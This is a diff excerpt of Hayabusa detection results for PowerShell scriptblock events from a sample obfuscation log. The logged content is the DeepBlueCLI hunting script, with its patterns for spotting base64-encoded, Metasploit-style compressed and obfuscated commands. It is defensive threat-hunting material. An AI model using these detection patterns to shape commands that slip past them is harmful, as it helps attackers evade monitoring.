"".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ $eventxml.Event.EventData.Data[4].""#text"" $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational""",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:43:05.021 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue <at> backshore <dot> net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ $eventxml.Event.EventData.Data[4].""#text"" $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:43:05.021 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"{$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:43:05.021 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:43:05.021 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:43:05.024 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command 